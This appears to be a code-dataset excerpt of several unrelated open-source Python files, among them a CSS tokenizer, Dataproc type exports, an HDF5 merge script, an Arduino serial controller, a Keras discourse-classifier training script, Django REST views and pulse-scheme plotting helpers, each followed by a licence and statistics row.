"normalize and do unicodesub"
return normalize(self.unicodesub(_repl, value))
line = col = 1
# check for BOM first as it should only be max one at the start
(BOM, matcher), productions = self.tokenmatches[0], self.tokenmatches[1:]
match = matcher(text)
if match:
found = match.group(0)
yield (BOM, found, line, col)
text = text[len(found):]
# check for @charset which is valid only at start of CSS
if text.startswith('@charset '):
found = '@charset ' # production has trailing S!
yield (CSSProductions.CHARSET_SYM, found, line, col)
text = text[len(found):]
col += len(found)
while text:
# do pushed tokens before new ones
for pushed in self._pushed:
yield pushed
# speed test for most used CHARs, sadly . not possible :(
c = text[0]
if c in u',:;{}>+[]':
yield ('CHAR', c, line, col)
col += 1
text = text[1:]
else:
# check all other productions, at least CHAR must match
for name, matcher in productions:
# TODO: USE bad comment?
if fullsheet and name == 'CHAR' and text.startswith(u'/*'):
# before CHAR production test for incomplete comment
possiblecomment = u'%s*/' % text
match = self.commentmatcher(possiblecomment)
if match and self._doComments:
yield ('COMMENT', possiblecomment, line, col)
text = None # ate all remaining text
break
match = matcher(text) # if no match try next production
if match:
found = match.group(0) # needed later for line/col
if fullsheet:
# check if found may be completed into a full token
if 'INVALID' == name and text == found:
# complete INVALID to STRING with start char " or '
name, found = 'STRING', '%s%s' % (found, found[0])
elif 'FUNCTION' == name and\
u'url(' == _normalize(found):
# url( is a FUNCTION if incomplete sheet
# FUNCTION production MUST BE after URI production
for end in (u"')", u'")', u')'):
possibleuri = '%s%s' % (text, end)
match = self.urimatcher(possibleuri)
if match:
name, found = 'URI', match.group(0)
break
if name in ('DIMENSION', 'IDENT', 'STRING', 'URI',
'HASH', 'COMMENT', 'FUNCTION', 'INVALID',
'UNICODE-RANGE'):
# may contain unicode escape, replace with normal
# char but do not _normalize (?)
value = self.unicodesub(_repl, found)
if name in ('STRING', 'INVALID'): #'URI'?
# remove \ followed by nl (so escaped) from string
value = self.cleanstring('', found)
else:
if 'ATKEYWORD' == name:
try:
# get actual ATKEYWORD SYM
name = self._atkeywords[_normalize(found)]
except KeyError, e:
# might also be misplace @charset...
if '@charset' == found and u' ' == text[len(found):len(found)+1]:
# @charset needs tailing S!
name = CSSProductions.CHARSET_SYM
found += u' '
else:
name = 'ATKEYWORD'
value = found # should not contain unicode escape (?)
if self._doComments or (not self._doComments and
name != 'COMMENT'):
yield (name, value, line, col)
text = text[len(found):]
nls = found.count(self._linesep)
line += nls
if nls:
col = len(found[found.rfind(self._linesep):])
else:
col += len(found)
break
if fullsheet:
yield ('EOF', u'', line, col)
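# Usage sketch added for illustration; it is not part of the original module.
# It tokenizes a tiny stylesheet with the default macros/productions and
# prints the resulting (name, value, line, col) tuples.
if __name__ == '__main__':
    tokenizer = Tokenizer()
    for name, value, line, col in tokenizer.tokenize(u"a { color: red }"):
        print name, repr(value), line, col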
| gpl-3.0 | -3,785,011,545,157,365,000 | 41.851351 | 101 | 0.451567 | false |
googleapis/python-dataproc | google/cloud/dataproc_v1/types/__init__.py | 1 | 5250 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .autoscaling_policies import (
AutoscalingPolicy,
BasicAutoscalingAlgorithm,
BasicYarnAutoscalingConfig,
CreateAutoscalingPolicyRequest,
DeleteAutoscalingPolicyRequest,
GetAutoscalingPolicyRequest,
InstanceGroupAutoscalingPolicyConfig,
ListAutoscalingPoliciesRequest,
ListAutoscalingPoliciesResponse,
UpdateAutoscalingPolicyRequest,
)
from .clusters import (
AcceleratorConfig,
AutoscalingConfig,
Cluster,
ClusterConfig,
ClusterMetrics,
ClusterStatus,
CreateClusterRequest,
DeleteClusterRequest,
DiagnoseClusterRequest,
DiagnoseClusterResults,
DiskConfig,
EncryptionConfig,
EndpointConfig,
GceClusterConfig,
GetClusterRequest,
GkeClusterConfig,
IdentityConfig,
InstanceGroupConfig,
KerberosConfig,
LifecycleConfig,
ListClustersRequest,
ListClustersResponse,
ManagedGroupConfig,
MetastoreConfig,
NodeGroupAffinity,
NodeInitializationAction,
ReservationAffinity,
SecurityConfig,
ShieldedInstanceConfig,
SoftwareConfig,
StartClusterRequest,
StopClusterRequest,
UpdateClusterRequest,
)
from .jobs import (
CancelJobRequest,
DeleteJobRequest,
GetJobRequest,
HadoopJob,
HiveJob,
Job,
JobMetadata,
JobPlacement,
JobReference,
JobScheduling,
JobStatus,
ListJobsRequest,
ListJobsResponse,
LoggingConfig,
PigJob,
PrestoJob,
PySparkJob,
QueryList,
SparkJob,
SparkRJob,
SparkSqlJob,
SubmitJobRequest,
UpdateJobRequest,
YarnApplication,
)
from .operations import (
ClusterOperationMetadata,
ClusterOperationStatus,
)
from .shared import (
    Component,  # referenced in __all__ below; assumed to be defined in .shared
)
from .workflow_templates import (
ClusterOperation,
ClusterSelector,
CreateWorkflowTemplateRequest,
DeleteWorkflowTemplateRequest,
GetWorkflowTemplateRequest,
InstantiateInlineWorkflowTemplateRequest,
InstantiateWorkflowTemplateRequest,
ListWorkflowTemplatesRequest,
ListWorkflowTemplatesResponse,
ManagedCluster,
OrderedJob,
ParameterValidation,
RegexValidation,
TemplateParameter,
UpdateWorkflowTemplateRequest,
ValueValidation,
WorkflowGraph,
WorkflowMetadata,
WorkflowNode,
WorkflowTemplate,
WorkflowTemplatePlacement,
)
__all__ = (
"AutoscalingPolicy",
"BasicAutoscalingAlgorithm",
"BasicYarnAutoscalingConfig",
"CreateAutoscalingPolicyRequest",
"DeleteAutoscalingPolicyRequest",
"GetAutoscalingPolicyRequest",
"InstanceGroupAutoscalingPolicyConfig",
"ListAutoscalingPoliciesRequest",
"ListAutoscalingPoliciesResponse",
"UpdateAutoscalingPolicyRequest",
"AcceleratorConfig",
"AutoscalingConfig",
"Cluster",
"ClusterConfig",
"ClusterMetrics",
"ClusterStatus",
"CreateClusterRequest",
"DeleteClusterRequest",
"DiagnoseClusterRequest",
"DiagnoseClusterResults",
"DiskConfig",
"EncryptionConfig",
"EndpointConfig",
"GceClusterConfig",
"GetClusterRequest",
"GkeClusterConfig",
"IdentityConfig",
"InstanceGroupConfig",
"KerberosConfig",
"LifecycleConfig",
"ListClustersRequest",
"ListClustersResponse",
"ManagedGroupConfig",
"MetastoreConfig",
"NodeGroupAffinity",
"NodeInitializationAction",
"ReservationAffinity",
"SecurityConfig",
"ShieldedInstanceConfig",
"SoftwareConfig",
"StartClusterRequest",
"StopClusterRequest",
"UpdateClusterRequest",
"CancelJobRequest",
"DeleteJobRequest",
"GetJobRequest",
"HadoopJob",
"HiveJob",
"Job",
"JobMetadata",
"JobPlacement",
"JobReference",
"JobScheduling",
"JobStatus",
"ListJobsRequest",
"ListJobsResponse",
"LoggingConfig",
"PigJob",
"PrestoJob",
"PySparkJob",
"QueryList",
"SparkJob",
"SparkRJob",
"SparkSqlJob",
"SubmitJobRequest",
"UpdateJobRequest",
"YarnApplication",
"ClusterOperationMetadata",
"ClusterOperationStatus",
"Component",
"ClusterOperation",
"ClusterSelector",
"CreateWorkflowTemplateRequest",
"DeleteWorkflowTemplateRequest",
"GetWorkflowTemplateRequest",
"InstantiateInlineWorkflowTemplateRequest",
"InstantiateWorkflowTemplateRequest",
"ListWorkflowTemplatesRequest",
"ListWorkflowTemplatesResponse",
"ManagedCluster",
"OrderedJob",
"ParameterValidation",
"RegexValidation",
"TemplateParameter",
"UpdateWorkflowTemplateRequest",
"ValueValidation",
"WorkflowGraph",
"WorkflowMetadata",
"WorkflowNode",
"WorkflowTemplate",
"WorkflowTemplatePlacement",
)
| apache-2.0 | 7,266,723,360,725,168,000 | 24.119617 | 74 | 0.719238 | false |
startcode/apollo | modules/tools/prediction/mlp_train/merge_h5.py | 1 | 2643 | #!/usr/bin/env python
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import os
import glob
import argparse
import datetime
import numpy as np
import h5py
def load_hdf5(filename):
"""
load training samples from *.hdf5 file
"""
if not(os.path.exists(filename)):
print "file:", filename, "does not exist"
os._exit(1)
if os.path.splitext(filename)[1] != '.h5':
print "file:", filename, "is not an hdf5 file"
os._exit(1)
h5_file = h5py.File(filename, 'r')
values = h5_file.values()[0]
print "load data size:", values.shape[0]
return values
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'generate training samples\
from a specified directory')
parser.add_argument('directory', type=str,
help='directory contains feature files in .h5')
args = parser.parse_args()
path = args.directory
print "load h5 from directory:", format(path)
if os.path.isdir(path):
features = None
labels = None
h5_files = glob.glob(path + '/*.h5')
print "Length of files:", len(h5_files)
for i, h5_file in enumerate(h5_files):
print "Process File", i, ":", h5_file
feature = load_hdf5(h5_file)
if np.any(np.isinf(feature)):
print "inf data found"
features = np.concatenate((features, feature), axis=0) if features is not None \
else feature
else:
print "Fail to find", path
os._exit(-1)
date = datetime.datetime.now().strftime('%Y-%m-%d')
sample_dir = path + '/mlp_merge'
if not os.path.exists(sample_dir):
os.makedirs(sample_dir)
sample_file = sample_dir + '/mlp_' + date + '.h5'
print "Save samples file to:", sample_file
h5_file = h5py.File(sample_file, 'w')
h5_file.create_dataset('data', data=features)
h5_file.close()
| apache-2.0 | -8,108,443,370,418,419,000 | 32.455696 | 92 | 0.595157 | false |
twitter/heron | integration_test/src/python/integration_test/topology/one_spout_multi_tasks/one_spout_multi_tasks.py | 2 | 1572 | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-docstring
from heronpy.api.stream import Grouping
from integration_test.src.python.integration_test.core import TestTopologyBuilder
from integration_test.src.python.integration_test.common.bolt import IdentityBolt
from integration_test.src.python.integration_test.common.spout import ABSpout
def one_spout_multi_tasks_builder(topology_name, http_server_url):
builder = TestTopologyBuilder(topology_name, http_server_url)
ab_spout = builder.add_spout("ab-spout", ABSpout, 3)
builder.add_bolt("identity-bolt", IdentityBolt,
inputs={ab_spout: Grouping.SHUFFLE},
par=1,
optional_outputs=['word'])
return builder.create_topology()
| apache-2.0 | 4,743,227,587,584,489,000 | 40.368421 | 81 | 0.741094 | false |
webbhorn/Arduino-Switch-Controller | arduino/arduino.py | 1 | 2214 | #!/usr/bin/env python
import serial, time
class Arduino(object):
__OUTPUT_PINS = -1
def __init__(self, port, baudrate=9600):
self.serial = serial.Serial(port, baudrate)
def __str__(self):
return "Arduino is on port %s at %d baudrate" %(self.serial.port, self.serial.baudrate)
def output(self, pinArray):
self.__sendData(len(pinArray))
if(isinstance(pinArray, list) or isinstance(pinArray, tuple)):
self.__OUTPUT_PINS = pinArray
for each_pin in pinArray:
self.__sendPin(each_pin)
return True
def setLow(self, pin):
self.__sendData('0')
self.__sendPin(pin)
return True
def setHigh(self, pin):
self.__sendData('1')
self.__sendPin(pin)
return True
def getState(self, pin):
self.__sendData('2')
self.__sendPin(pin)
return self.__formatPinState(self.__getData())
def analogWrite(self, pin, value):
self.__sendData('3')
hex_value = hex(value)[2:]
		if(len(hex_value)==1):
			# pad a single hex digit with a leading '0' (indexing hex_value[1]
			# here used to raise IndexError for values below 16)
			self.__sendData('0')
			self.__sendData(hex_value[0])
		else:
			self.__sendData(hex_value[0])
			self.__sendData(hex_value[1])
return True
def analogRead(self, pin):
self.__sendData('4')
self.__sendPin(pin)
return self.__getData()
def turnOff(self):
for each_pin in self.__OUTPUT_PINS:
self.setLow(each_pin)
return True
def __sendPin(self, pin):
pin_in_char = chr(pin+48)
self.__sendData(pin_in_char)
def __sendData(self, serial_data):
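		# Handshake: block until the firmware asks for data by sending "what",
		# then write the payload (assumed protocol of the companion sketch).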
while(self.__getData()!="what"):
pass
self.serial.write(str(serial_data))
def __getData(self):
return self.serial.readline().replace("\r\n","")
def __formatPinState(self, pinValue):
if pinValue=='1':
return True
else:
return False
def close(self):
self.serial.close()
return True
"""
def __del__(self):
#close serial connection once program ends
#this fixes the problem of port getting locked or unrecoverable in some linux systems
self.serial.close()
"""
| mit | 4,657,381,806,307,410,000 | 24.744186 | 95 | 0.555104 | false |
jimmycallin/master-thesis | architectures/conll16st-v34-focused-rnns/v34/train.py | 1 | 11478 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0103,W0621
"""
Train the discourse relation sense classifier (CoNLL16st).
"""
__author__ = "GW [http://gw.tnode.com/] <[email protected]>"
__license__ = "GPLv3+"
import argparse
import codecs
import json
import logging
import os
import sys
from keras.models import Model
from keras.callbacks import ModelCheckpoint, EarlyStopping
from keras.layers import Input, Embedding, TimeDistributed, Dense, merge, GRU, Dropout, Activation, Lambda, K
from keras.layers.advanced_activations import SReLU
from conll16st_data.load import Conll16stDataset
from generic_utils import Tee, debugger, load_from_pkl, save_to_pkl
from data_utils import build_index, batch_generator, load_word2vec
# logging
sys.excepthook = debugger # attach debugger
sys.stdout = Tee([sys.stdout])
sys.stderr = Tee([sys.stderr])
logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%Y-%m-%d %H:%M", level=logging.DEBUG)
log = logging.getLogger(__name__)
# parse arguments
argp = argparse.ArgumentParser(description=__doc__.strip().split("\n", 1)[0])
argp.add_argument('experiment_dir',
help="directory for storing trained model and other resources")
argp.add_argument('train_dir',
help="CoNLL16st dataset directory for training")
argp.add_argument('valid_dir',
help="CoNLL16st dataset directory for validation")
argp.add_argument('--clean', action='store_true',
help="clean previous experiment")
argp.add_argument('--config', type=json.loads,
help="override default experiment configuration (dict as string)")
argp.add_argument('--static_input_embedding', action='store_true')
args = argp.parse_args()
# experiment files
console_log = "{}/console.log".format(args.experiment_dir)
indexes_pkl = "{}/indexes.pkl".format(args.experiment_dir)
indexes_size_pkl = "{}/indexes_size.pkl".format(args.experiment_dir)
train_snapshot_dir = "{}/train_snapshot".format(args.experiment_dir)
valid_snapshot_dir = "{}/valid_snapshot".format(args.experiment_dir)
model_yaml = "{}/model.yaml".format(args.experiment_dir)
model_png = "{}/model.png".format(args.experiment_dir)
metrics_csv = "{}/metrics.csv".format(args.experiment_dir)
metrics_png = "{}/metrics.png".format(args.experiment_dir)
weights_hdf5 = "{}/weights.hdf5".format(args.experiment_dir)
weights_val_hdf5 = "{}/weights_val.hdf5".format(args.experiment_dir)
static_input_embedding = args.static_input_embedding
# experiment initialization
if args.clean and os.path.isdir(args.experiment_dir):
import shutil
shutil.rmtree(args.experiment_dir)
if not os.path.isdir(args.experiment_dir):
os.makedirs(args.experiment_dir)
f_log = codecs.open(console_log, mode='a', encoding='utf8')
try:
sys.stdout.files.append(f_log)
sys.stderr.files.append(f_log)
except AttributeError:
f_log.close()
# experiment configuration
log.info("configuration ({})".format(args.experiment_dir))
if args.config:
config = args.config
else:
config = {}
def c(k, d):
log.debug(" config '{}': {} ({})".format(k, config.get(k, ""), d))
return config.get(k, d)
epochs = int(c('epochs', 1000)) #= 200 (for real epochs)
epochs_len = int(c('epochs_len', -1)) #= -1 (for real epochs)
epochs_patience = int(c('epochs_patience', 20)) #=10 (for real epochs)
batch_size = int(c('batch_size', 64)) #= 16
snapshot_size = int(c('snapshot_size', 2048))
random_per_sample = int(c('random_per_sample', 32))
words_dim = int(c('words_dim', 20))
focus_dim = int(c('focus_dim', 4)) #3-6?
rnn_dim = int(c('rnn_dim', 20)) #10-20?
final_dim = int(c('final_dim', 100))
arg1_len = int(c('arg1_len', 100)) #= 100 (en), 500 (zh)
arg2_len = int(c('arg2_len', 100)) #= 100 (en), 500 (zh)
conn_len = int(c('conn_len', 10)) #= 10 (en, zh)
punc_len = int(c('punc_len', 2)) #=0 (en, but error), 2 (zh)
words_dropout = c('words_dropout', 0.1) #0-0.2?
focus_dropout_W = c('focus_dropout_W', 0.33) #0?, >0.5?
focus_dropout_U = c('focus_dropout_U', 0.66) #0?, irrelevant?
rnn_dropout_W = c('rnn_dropout_W', 0.33) #0.6-0.8?, irrelevant?
rnn_dropout_U = c('rnn_dropout_U', 0.33) #0-0.5?
final_dropout = c('final_dropout', 0.5) #0.4-0.9?, <0.5?
filter_types = None
#filter_types = ["Explicit"]
#filter_types = ["Implicit", "EntRel", "AltLex"]
filter_senses = None
#filter_senses = ["Contingency.Condition"]
filter_fn_name = c('filter_fn_name', "conn_eq_0")
if filter_fn_name == "conn_eq_0": # connective length not equals 0
filter_fn = lambda r: len(r['Connective']['TokenList']) == 0
elif filter_fn_name == "conn_gt_0": # connective length not greater than 0
filter_fn = lambda r: len(r['Connective']['TokenList']) > 0
else: # no filter
filter_fn = None
# initialize weights with pre-trained word2vec embeddings
words2vec_bin = c('words2vec_bin', None) # en="./data/word2vec-en/GoogleNews-vectors-negative300.bin.gz"
words2vec_txt = c('words2vec_txt', None) # zh="./data/word2vec-zh/zh-Gigaword-300.txt"
for var in ['args.experiment_dir', 'args.train_dir', 'args.valid_dir', 'K._config', 'os.getenv("THEANO_FLAGS")', 'filter_types', 'filter_senses', 'filter_fn_name', 'config']:
log.info(" {}: {}".format(var, eval(var)))
# load datasets
log.info("load dataset for training ({})".format(args.train_dir))
train = Conll16stDataset(args.train_dir, filter_types=filter_types, filter_senses=filter_senses, filter_fn=filter_fn)
log.info(train.summary())
if epochs_len < 0:
epochs_len = len(train['rel_ids'])
log.info("load dataset for validation ({})".format(args.valid_dir))
valid = Conll16stDataset(args.valid_dir, filter_types=filter_types, filter_senses=filter_senses, filter_fn=filter_fn)
log.info(valid.summary())
# build indexes
if not os.path.isfile(indexes_pkl) or not os.path.isfile(indexes_size_pkl):
log.info("build indexes")
indexes = {}
indexes_size = {}
else:
log.info("previous indexes ({})".format(indexes_pkl))
indexes = load_from_pkl(indexes_pkl)
indexes_size = load_from_pkl(indexes_size_pkl)
indexes['words2id'], indexes_size['words2id'] = build_index(train['words'])
indexes['rel_senses2id'], indexes_size['rel_senses2id'] = build_index(train['rel_senses'])
log.info(" " + ", ".join([ "{}: {}".format(k, v) for k, v in indexes_size.items() ]))
save_to_pkl(indexes_pkl, indexes)
save_to_pkl(indexes_size_pkl, indexes_size)
init_weights = load_word2vec(indexes['words2id'], indexes_size['words2id'], words_dim, words2vec_bin, words2vec_txt)
# build model
log.info("build model")
words2id_size = indexes_size['words2id']
rel_senses2id_size = indexes_size['rel_senses2id']
shared_emb = Embedding(input_dim=words2id_size, output_dim=words_dim, weights=init_weights, dropout=words_dropout, mask_zero=True, name="shared_emb", trainable=not static_input_embedding)
# input: arg1 word/token ids
arg1_ids = Input(shape=(arg1_len,), dtype='int32', name="arg1_ids")
# shape: (sample, arg1_len) of words2id_size
# input: arg2 word/token ids
arg2_ids = Input(shape=(arg2_len,), dtype='int32', name="arg2_ids")
# shape: (sample, arg2_len) of words2id_size
# input: connective word/token ids
conn_ids = Input(shape=(conn_len,), dtype='int32', name="conn_ids")
# shape: (sample, conn_len) of words2id_size
# input: punctuation word/token ids
punc_ids = Input(shape=(punc_len,), dtype='int32', name="punc_ids")
# shape: (sample, punc_len) of words2id_size
def focused_rnns(arg1_ids):
"""One RNN decides focus weights for other RNNs."""
# embed arg1 input sequence
arg1_emb = shared_emb(arg1_ids)
# shape: (sample, arg1_len, words_dim)
# focus weights for all RNNs
focus_weights = GRU(focus_dim, return_sequences=True, dropout_U=focus_dropout_U, dropout_W=focus_dropout_W)(arg1_emb)
# shape: (sample, arg1_len, focus_dim)
# individual RNNs with focus
rnns = []
for i in range(focus_dim):
# focus weights for current RNN
select_repeat = Lambda(lambda x: K.repeat_elements(x[:, i], words_dim, axis=-1), output_shape=lambda s: s[:1] + (words_dim,))
rnn_focus = TimeDistributed(select_repeat)(focus_weights)
# shape: (samples, arg1_len, words_dim)
# weighted input sequence
rnn_in = merge([arg1_emb, rnn_focus], mode='mul')
# shape: (samples, arg1_len, words_dim)
# individual RNN
rnn = GRU(rnn_dim, return_sequences=False, dropout_U=rnn_dropout_U, dropout_W=rnn_dropout_W)(rnn_in)
rnns.append(rnn)
# shape: (samples, rnn_dim)
return rnns
# merge focused RNNs
arg1_rnns = focused_rnns(arg1_ids)
arg2_rnns = focused_rnns(arg2_ids)
conn_rnns = focused_rnns(conn_ids)
punc_rnns = focused_rnns(punc_ids)
# dense layer with logistic regression on top
x = merge(arg1_rnns + arg2_rnns + conn_rnns + punc_rnns, mode='concat')
x = Dense(final_dim)(x)
x = SReLU()(x)
x = Dropout(final_dropout)(x)
# shape: (samples, 2*hidden_dim)
x = Dense(rel_senses2id_size)(x)
x = Activation('softmax', name='rsenses')(x)
# shape: (samples, rel_senses2id_size)
inputs = [arg1_ids, arg2_ids, conn_ids, punc_ids]
outputs = [x]
losses = {
'rsenses': c('rsenses_loss', 'categorical_crossentropy'),
}
metrics = {
'rsenses': ['accuracy', 'loss'],
}
model = Model(input=inputs, output=outputs)
with open(model_yaml, 'w') as f:
model.to_yaml(stream=f)
model.summary()
model.compile(optimizer=c('optimizer', "adam"), loss=losses, metrics=metrics)
# initialize weights
if not os.path.isfile(weights_hdf5):
log.info("initialize weights")
else:
log.info("previous weights ({})".format(args.experiment_dir))
model.load_weights(weights_hdf5)
# prepare for training
log.info("prepare snapshots")
#if not os.path.isdir(train_snapshot_dir):
#train_snapshot = next(batch_generator(train, indexes, indexes_size, arg1_len, arg2_len, conn_len, punc_len, min(len(train['rel_ids']), snapshot_size), random_per_sample=0))
# save_dict_of_np(train_snapshot_dir, train_snapshot)
#train_snapshot = load_dict_of_np(train_snapshot_dir)
#if not os.path.isdir(valid_snapshot_dir):
valid_snapshot = next(batch_generator(valid, indexes, indexes_size, arg1_len, arg2_len, conn_len, punc_len, min(len(valid['rel_ids']), snapshot_size), random_per_sample=0))
# save_dict_of_np(valid_snapshot_dir, valid_snapshot)
#valid_snapshot = load_dict_of_np(valid_snapshot_dir)
train_iter = batch_generator(train, indexes, indexes_size, arg1_len, arg2_len, conn_len, punc_len, batch_size, random_per_sample=random_per_sample)
# train model
log.info("train model")
callbacks = [
ModelCheckpoint(monitor='loss', mode='min', filepath=weights_hdf5, save_best_only=True),
ModelCheckpoint(monitor='val_loss', mode='min', filepath=weights_val_hdf5, save_best_only=True),
EarlyStopping(monitor='val_loss', mode='min', patience=epochs_patience),
]
history = model.fit_generator(train_iter, nb_epoch=epochs, samples_per_epoch=epochs_len, validation_data=valid_snapshot, callbacks=callbacks, verbose=2)
log.info("training finished")
# return best result for hyperopt
results = {}
for k in history.history:
results[k] = history.history[k][-1] # copy others
results['loss_min'] = min(history.history['loss'])
results['acc_max'] = max(history.history['acc'])
results['val_loss_min'] = min(history.history['val_loss'])
results['val_acc_max'] = max(history.history['val_acc'])
results['epochs_len'] = len(history.history['loss'])
results['loss_'] = results['loss']
results['loss'] = -results['val_acc_max'] # objective for minimization
results['status'] = 'ok'
print("\n\n{}".format(json.dumps(results)))
| mit | 9,170,306,203,527,456,000 | 39.702128 | 187 | 0.694372 | false |
clouserw/zamboni | mkt/websites/views.py | 1 | 1959 | from django.db.transaction import non_atomic_requests
from rest_framework.generics import ListAPIView
from rest_framework.permissions import AllowAny
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.api.paginator import ESPaginator
from mkt.search.filters import (PublicSearchFormFilter, RegionFilter,
SearchQueryFilter)
from mkt.search.forms import SimpleSearchForm
from mkt.websites.indexers import WebsiteIndexer
from mkt.websites.models import Website
from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer
class WebsiteView(CORSMixin, MarketplaceView, ListAPIView):
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
serializer_class = WebsiteSerializer
model = Website
class WebsiteSearchView(CORSMixin, MarketplaceView, ListAPIView):
"""
Base website search view based on a single-string query.
"""
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
filter_backends = [PublicSearchFormFilter, RegionFilter, SearchQueryFilter]
serializer_class = ESWebsiteSerializer
paginator_class = ESPaginator
form_class = SimpleSearchForm
def get_queryset(self):
return WebsiteIndexer.search()
@classmethod
def as_view(cls, **kwargs):
# Make all search views non_atomic: they should not need the db, or
# at least they should not need to make db writes, so they don't need
# to be wrapped in transactions.
view = super(WebsiteSearchView, cls).as_view(**kwargs)
return non_atomic_requests(view)
| bsd-3-clause | -3,533,117,552,146,456,000 | 38.979592 | 79 | 0.720265 | false |
rizumu/bootmachine | bootmachine/management/__init__.py | 1 | 3322 | # (c) 2008-2011 James Tauber and contributors; written for Pinax (http://pinaxproject.com)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
import os
import sys
import bootmachine
BOOTMACHINE_COMMAND_DIR = os.path.join(
os.path.dirname(bootmachine.__file__), "management", "commands"
)
class CommandNotFound(Exception):
pass
class CommandLoader(object):
def __init__(self):
self.command_dir = BOOTMACHINE_COMMAND_DIR
self.commands = {}
self._load_commands()
def _load_commands(self):
for f in os.listdir(self.command_dir):
if not f.startswith("_") and f.endswith(".py"):
name = f[:-3]
mod = "bootmachine.management.commands.%s" % name
try:
__import__(mod)
except:
self.commands[name] = sys.exc_info()
else:
mod = sys.modules[mod]
self.commands[name] = mod.Command()
def load(self, name):
try:
command = self.commands[name]
except KeyError:
raise CommandNotFound("Unable to find command '%s'" % name)
else:
if isinstance(command, tuple):
# an exception occurred when importing the command so let's
# re-raise it here
                raise command[0], command[1], command[2]  # Python 2 three-expression raise preserves the traceback
return command
class CommandRunner(object):
usage = "bootmachine-admin command [options] [args]"
def __init__(self, argv=None):
self.argv = argv or sys.argv[:]
self.loader = CommandLoader()
self.loader.commands["help"] = self.help()
def help(self):
loader, usage = self.loader, self.usage
# use BaseCommand for --version
from bootmachine.management.base import BaseCommand
class HelpCommand(BaseCommand):
def handle(self, *args, **options):
print("Usage: {}\n".format(usage))
print("Options:"
" --version show program's version number and exit\n"
" -h, --help show this help message and exit\n"
"Available commands:\n")
for command in loader.commands.keys():
print(" {}".format(command))
return HelpCommand()
def execute(self):
argv = self.argv[:]
try:
command = self.argv[1]
except IndexError:
# display help if no arguments were given.
command = "help"
argv.extend(["help"])
# special cases for bootmachine-admin itself
if command in ["-h", "--help"]:
argv.pop()
command = "help"
argv.extend(["help"])
if command == "--version":
argv.pop()
command = "help"
argv.extend(["help", "--version"])
# load command and run it!
try:
self.loader.load(command).run_from_argv(argv)
except CommandNotFound as e:
sys.stderr.write("{}\n".format(e.args[0]))
sys.exit(1)
def execute_from_command_line():
"""
A simple method that runs a ManagementUtility.
"""
runner = CommandRunner()
runner.execute()
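# Usage sketch added for illustration; it is not part of the original module.
# A setuptools entry point would typically expose execute_from_command_line as
# the ``bootmachine-admin`` console script, e.g. in setup.py (exact project
# configuration assumed, not taken from this repository):
#
#     entry_points={
#         'console_scripts': [
#             'bootmachine-admin = bootmachine.management:execute_from_command_line',
#         ],
#     }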
| mit | -1,116,202,746,595,356,300 | 30.339623 | 90 | 0.54124 | false |
DiCarloLab-Delft/PycQED_py3 | pycqed/utilities/pulse_scheme.py | 1 | 5469 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches
def new_pulse_fig(figsize):
'''
Open a new figure and configure it to plot pulse schemes.
'''
fig, ax = plt.subplots(1, 1, figsize=figsize, frameon=False)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return fig, ax
def new_pulse_subplot(fig, *args, **kwargs):
'''
Add a new subplot configured for plotting pulse schemes to a figure.
All *args and **kwargs are passed to fig.add_subplot.
'''
ax = fig.add_subplot(*args, **kwargs)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return ax
def mwPulse(ax, pos, y_offs=0, width=1.5, amp=1, label=None, phase=0, labelHeight=1.3,
color='C0', modulation='normal', **plot_kws):
'''
Draw a microwave pulse: Gaussian envelope with modulation.
'''
x = np.linspace(pos, pos + width, 100)
envPos = amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
envNeg = -amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
if modulation == 'normal':
mod = envPos * np.sin(2 * np.pi * 3 / width * x + phase)
elif modulation == 'high':
mod = envPos * np.sin(5 * np.pi * 3 / width * x + phase)
else:
raise ValueError()
ax.plot(x, envPos+y_offs, '--', color=color, **plot_kws)
ax.plot(x, envNeg+y_offs, '--', color=color, **plot_kws)
ax.plot(x, mod+y_offs, '-', color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='right', color=color)
return pos + width
def fluxPulse(ax, pos, y_offs=0, width=2.5, s=.1, amp=1.5, label=None, labelHeight=1.7,
